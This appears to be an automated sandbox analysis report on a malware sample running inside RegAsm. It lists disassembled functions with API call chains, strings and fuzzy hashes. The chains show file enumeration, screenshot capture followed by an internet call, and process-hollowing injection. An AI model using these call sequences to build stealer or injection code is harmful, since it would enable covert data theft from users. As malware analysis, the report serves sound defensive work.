Instruction Fuzzy Hash: 1A917371C0124CEACF05EBE5D946ADEBBB8AF19304F10415EF445632C2DB782788CBA6

Function 00406946 Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03a2e1c2cf91ea7924cc7b1d25e2e67bb2d1624b918509cae87971aef5fcc72e
Instruction ID: 13de0ee2bbba44081eee024592a0435cafe709557d276950de3c4a7bfd5f7e37
Opcode Fuzzy Hash: 03a2e1c2cf91ea7924cc7b1d25e2e67bb2d1624b918509cae87971aef5fcc72e
Instruction Fuzzy Hash: AE412C71E002169FCF14EF94DD849AEBBB1AB05314F12847FE916B7391D6389EA08F58

Non-executed Functions

Function 00416824 Relevance: 44.1, APIs: 21, Strings: 4, Instructions: 316stringfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00416829
wsprintfA.USER32 ref: 0041684F
FindFirstFileA.KERNEL32(?,?), ref: 00416866
memset.MSVCRT ref: 0041687D
memset.MSVCRT ref: 0041688B
StrCmpCA.SHLWAPI(?,0042790C), ref: 004168A9
StrCmpCA.SHLWAPI(?,00427910), ref: 004168C3
wsprintfA.USER32 ref: 004168E7
StrCmpCA.SHLWAPI(?,004276C3), ref: 004168F8
wsprintfA.USER32 ref: 0041691E
wsprintfA.USER32 ref: 00416932
memset.MSVCRT ref: 00416944
lstrcat.KERNEL32(?,?), ref: 00416956
strtok_s.MSVCRT ref: 0041698F
memset.MSVCRT ref: 004169A4
lstrcat.KERNEL32(?,?), ref: 004169B9
PathMatchSpecA.SHLWAPI(?,00000000), ref: 004169DC

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00416ADE
strtok_s.MSVCRT ref: 00416B0F
FindNextFileA.KERNEL32(000000FF,?), ref: 00416C32
FindClose.KERNEL32(000000FF), ref: 00416C43

Strings

%s\%s, xrefs: 004168E1
%s\%s\%s, xrefs: 00416918
%s\%s, xrefs: 0041692C
%s\*.*, xrefs: 00416844

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcatlstrcpymemsetwsprintf$Find$Filestrtok_s$CloseFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
API String ID: 264515753-332874205
Opcode ID: cd97191f2bec433205b5db389b7ddf1aa7acef6f7e1a6162ac01d66056195985
Instruction ID: b12f10b5e76acf3b4554e4d27cd34d13087d496de5adceb57af86d68189f51cf
Opcode Fuzzy Hash: cd97191f2bec433205b5db389b7ddf1aa7acef6f7e1a6162ac01d66056195985
Instruction Fuzzy Hash: CDC192B1900249AFDF21EFA4DC45EEE7BBDAF09304F10405AF515E2191EB789A88CB65

Function 004176DE Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227stringfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004176E3
wsprintfA.USER32 ref: 00417703
FindFirstFileA.KERNEL32(?,?), ref: 0041771A
StrCmpCA.SHLWAPI(?,004279C8), ref: 00417737
StrCmpCA.SHLWAPI(?,004279CC), ref: 00417751
wsprintfA.USER32 ref: 00417775
StrCmpCA.SHLWAPI(?,004276CF), ref: 00417786
wsprintfA.USER32 ref: 004177A3

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918

wsprintfA.USER32 ref: 004177B7
PathMatchSpecA.SHLWAPI(?,?), ref: 004177CA
lstrcat.KERNEL32(?,?), ref: 004177F6
lstrcat.KERNEL32(?,004279E4), ref: 00417808
lstrcat.KERNEL32(?,?), ref: 00417818
lstrcat.KERNEL32(?,004279E8), ref: 0041782A
lstrcat.KERNEL32(?,?), ref: 0041783E
FindNextFileA.KERNEL32(00000000,?), ref: 004179D9
FindClose.KERNEL32(00000000), ref: 004179E8

Strings

%s\*, xrefs: 004176FD
%s\%s, xrefs: 0041776F
%s\%s, xrefs: 004177B1

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcat$H_prologwsprintf$Find$CloseCreatelstrcpy$AllocFirstHandleLocalMatchNextObjectPathReadSingleSizeSpecThreadWait
String ID: %s\%s$%s\%s$%s\*
API String ID: 3254224521-445461498
Opcode ID: 42aff5a7a86f482ea89734ff0b5cb4d9c81233b9d5fe59a4731e6acf6e4d0304
Instruction ID: b40771e78c1d0e7721a8fae64b10e5fcd75ea34c047ff05d04bc0f2fc121e518
Opcode Fuzzy Hash: 42aff5a7a86f482ea89734ff0b5cb4d9c81233b9d5fe59a4731e6acf6e4d0304
Instruction Fuzzy Hash: F8919071904249AFDF11EBA4DD4AADE7BBCAF09304F10409AF505E2191EB7897C8CBA5

Function 004120E5 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 162windowCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004120EA
memset.MSVCRT ref: 00412110
GetDesktopWindow.USER32 ref: 00412146
GetWindowRect.USER32(00000000,?), ref: 00412153
GetDC.USER32(00000000), ref: 0041215A
CreateCompatibleDC.GDI32(00000000), ref: 00412164
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00412175
SelectObject.GDI32(00000000,00000000), ref: 00412180
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041219C
GlobalFix.KERNEL32(?), ref: 004121FA
GlobalSize.KERNEL32(?), ref: 00412206

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768

Part of subcall function 004043AD: _EH_prolog.MSVCRT ref: 004043B2
Part of subcall function 004043AD: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404432
Part of subcall function 004043AD: StrCmpCA.SHLWAPI(?,00426987,00426983,0042697B,00426977), ref: 004044A4
Part of subcall function 004043AD: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4

SelectObject.GDI32(00000000,?), ref: 00412280
DeleteObject.GDI32(?), ref: 0041229B
DeleteObject.GDI32(00000000), ref: 004122A2
ReleaseDC.USER32(00000000,?), ref: 004122AC
CloseWindow.USER32(00000000), ref: 004122B3

Strings

image/jpeg, xrefs: 004121BC

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
String ID: image/jpeg
API String ID: 3067874393-3785015651
Opcode ID: d814f4808cc6073ac876f39dc9ff89d143fd4f415de4e544dcf7d24b90ece696
Instruction ID: 6f0dfb852c061cc8870e769f5ae699a1cb20ad8096a8b1f72079f4e5cf221edf
Opcode Fuzzy Hash: d814f4808cc6073ac876f39dc9ff89d143fd4f415de4e544dcf7d24b90ece696
Instruction Fuzzy Hash: 155128B6900218AFDB01DFE4DD499EEBFB9EF0A314F10502AFA01E2160D7354A958B65

Function 00417295 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 201stringmemoryfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041729A
GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 004172B2
HeapAlloc.KERNEL32(00000000,?,00000104), ref: 004172B9
wsprintfA.USER32 ref: 004172D1
FindFirstFileA.KERNEL32(?,?), ref: 004172E8
StrCmpCA.SHLWAPI(?,004279AC), ref: 00417305
StrCmpCA.SHLWAPI(?,004279B0), ref: 0041731F
wsprintfA.USER32 ref: 00417343

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989

Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3

Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B

Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00413B47: _EH_prolog.MSVCRT ref: 00413B4C
Part of subcall function 00413B47: memset.MSVCRT ref: 00413B6D
Part of subcall function 00413B47: memset.MSVCRT ref: 00413B7B
Part of subcall function 00413B47: lstrcat.KERNEL32(?,00000000), ref: 00413BA7
Part of subcall function 00413B47: lstrcat.KERNEL32(?), ref: 00413BC5
Part of subcall function 00413B47: lstrcat.KERNEL32(?,?), ref: 00413BD9
Part of subcall function 00413B47: lstrcat.KERNEL32(?), ref: 00413BEC
Part of subcall function 00413B47: StrStrA.SHLWAPI(00000000), ref: 00413C86

FindNextFileA.KERNEL32(00000000,?), ref: 00417472
FindClose.KERNEL32(00000000), ref: 00417481
lstrcat.KERNEL32(?,?), ref: 004174A6
lstrcat.KERNEL32(?), ref: 004174B9
lstrlenA.KERNEL32(?), ref: 004174C2
lstrlenA.KERNEL32(?), ref: 004174CF

Strings

%s\*, xrefs: 004172CB
%s\%s, xrefs: 0041733D

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prolog$lstrcpy$Findlstrlen$FileHeapmemsetwsprintf$AllocCloseFirstNextProcessSystemTime
String ID: %s\%s$%s\*
API String ID: 398052587-2848263008
Opcode ID: 37b2c64871137dd15fce1ba1004ff85981e9855166a87e3a0e60d662b1e00529
Instruction ID: 78fcd9c27a4ac5c97fb793c6618bb365e684501d37c762ca59ca7e4cb42f06b4
Opcode Fuzzy Hash: 37b2c64871137dd15fce1ba1004ff85981e9855166a87e3a0e60d662b1e00529
Instruction Fuzzy Hash: 06818C71904259AFDF00EBE4DD49BEEBB79AF0A308F00409AF515A3191EB785788CB65

Function 00416EF1 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 133stringfileCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00416EF6
wsprintfA.USER32 ref: 00416F19
FindFirstFileA.KERNEL32(?,?), ref: 00416F30
StrCmpCA.SHLWAPI(?,00427994), ref: 00416F52
StrCmpCA.SHLWAPI(?,00427998), ref: 00416F6C
lstrcat.KERNEL32(?,?), ref: 00416FA1
lstrcat.KERNEL32(?), ref: 00416FB4
lstrcat.KERNEL32(?,?), ref: 00416FC8
lstrcat.KERNEL32(?,?), ref: 00416FD8
lstrcat.KERNEL32(?,0042799C), ref: 00416FEA
lstrcat.KERNEL32(?,?), ref: 00416FFE

Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735

Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918

FindNextFileA.KERNEL32(00000000,?), ref: 00417098
FindClose.KERNEL32(00000000), ref: 004170A7

Strings

%s\%s, xrefs: 00416F13

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$H_prolog$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 2282932919-4073750446
Opcode ID: 194f6b2605ac6b6736ebe97dbc17ac7b24f5d41313bb03f3b58869011f42aff0
Instruction ID: 73827212a5f956904d6681c0419b84f2ed9c5454aeabf9d4ca45137ca8f025d0
Opcode Fuzzy Hash: 194f6b2605ac6b6736ebe97dbc17ac7b24f5d41313bb03f3b58869011f42aff0
Instruction Fuzzy Hash: B2512FB2900219ABCF20EBB1DD49EDE7B7DAB0A314F0045AAF605E3151D7389789CF65

Function 0040FE58 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 125threadinjectionmemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040FE81
memset.MSVCRT ref: 0040FE8D
CreateProcessA.KERNEL32(?,J#A,00000000,00000000,00000000,08000004,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0040FEAD
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,?,?,?,00000000,00000000), ref: 0040FEC1
GetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,00000000), ref: 0040FED3
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,00000000,00000000), ref: 0040FEF2
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,00000000,00000000), ref: 0040FF08
ResumeThread.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 0040FF18
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00000000,00000000), ref: 0040FF2F
WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 0040FF66
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,?,?,00000000,00000000), ref: 0040FF91
SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,00000000), ref: 0040FFA7
ResumeThread.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 0040FFB0

Strings

J#A, xrefs: 0040FEA7

Memory Dump Source

Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$MemoryThread$Write$AllocContextResumeVirtualmemset$CreateRead
String ID: J#A
API String ID: 619895632-1027528547
Opcode ID: 83cccb0ff96274933e56e86008731fb03d161b5d67559e309a12ea4b28d15485
Instruction ID: b4288349629a217c1a069d56d1852030e3af2687decd945e5e30b7ce06f10167
Opcode Fuzzy Hash: 83cccb0ff96274933e56e86008731fb03d161b5d67559e309a12ea4b28d15485
Instruction Fuzzy Hash: 63416D75A00209BFDB219F95DC49FAFBBBAFF46701F00402AFA15E61A0D774A954CB24

Function 1B7AD9E0 Relevance: 23.3, APIs: 8, Strings: 5, Instructions: 564COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B7ADACC, 1B7ADE2F
API called with NULL prepared statement, xrefs: 1B7ADA9B, 1B7ADDFE
%s at line %d of [%.10s], xrefs: 1B7ADADB, 1B7ADE3E
misuse, xrefs: 1B7ADAD6, 1B7ADE39
API called with finalized prepared statement, xrefs: 1B7ADAB0, 1B7ADE13

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: aa15d4e34404766ab4b6d4529184986ab385974dcf6a7e74ca40be9cf909de9c
Instruction ID: 027fd1eb9de08f14e55aa879230442a3895663477ce9307520a68660f2e437ab
Opcode Fuzzy Hash: aa15d4e34404766ab4b6d4529184986ab385974dcf6a7e74ca40be9cf909de9c
Instruction Fuzzy Hash: 2E12F2B09047419FE7608F34DC49BDB76E8BF45708F080A2CF89997281E776E549CBA2

Function 1B6AB400 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 367COMMON

Download Yara Rule

Strings

DESC, xrefs: 1B6AB656, 1B6AB65E, 1B6AB67D, 1B6AB685
SELECT %s ORDER BY rowid %s, xrefs: 1B6AB665
SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s, xrefs: 1B6AB696
ASC, xrefs: 1B6AB651, 1B6AB678

Memory Dump Source

Source File: 00000002.00000002.3330714298.000000001B688000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B680000, based on PE: true

Associated: 00000002.00000002.3330670721.000000001B680000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B681000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B7E6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3330714298.000000001B88D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B88F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331334896.000000001B898000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331434789.000000001B8C2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3331463797.000000001B8CF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1b680000_RegAsm.jbxd

Similarity

API ID:
String ID: ASC$DESC$SELECT %s ORDER BY rowid %s$SELECT %s WHERE rowid BETWEEN %lld AND %lld ORDER BY rowid %s
API String ID: 0-3496276579
Opcode ID: 064e7764d6eea86a0b8b3361bb30fa18d9876731d3b5391c09770f3f821b0501
Instruction ID: 0bab15be24a751829d1ac1a98a70f2fdb7427531bddfff11bde81422c50964f7
Opcode Fuzzy Hash: 064e7764d6eea86a0b8b3361bb30fa18d9876731d3b5391c09770f3f821b0501
Instruction Fuzzy Hash: 0AC100B59007419BCF118F34E8417EAB7E1FF95710F18092EE98ACA641E736F945CBA2

Function 00416C71 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 151stringCOMMON

Download Yara Rule

